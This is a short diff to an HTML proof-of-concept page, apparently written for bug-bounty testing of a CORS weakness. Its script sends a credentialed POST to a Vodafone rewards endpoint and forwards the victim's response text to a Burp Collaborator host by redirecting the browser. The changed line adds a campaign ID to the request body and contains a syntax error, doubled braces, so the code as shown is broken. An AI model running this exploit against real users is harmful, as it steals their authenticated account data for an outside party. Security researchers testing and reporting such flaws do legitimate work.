--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@ req.onload = reqListener;
 req.open('POST','https://ms.rewards.aws.cps.vodafone.com/rewards/getFavorites',true);
 req.withCredentials = true;
 req.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
-req.send(JSON.stringify({}));
+req.send(JSON.stringify({{"campaignId":25}));
 
 function reqListener() {
 location='https://fve62qlfx3w1t7goldxayutgu70xom.burpcollaborator.net/log?key='+this.responseText;
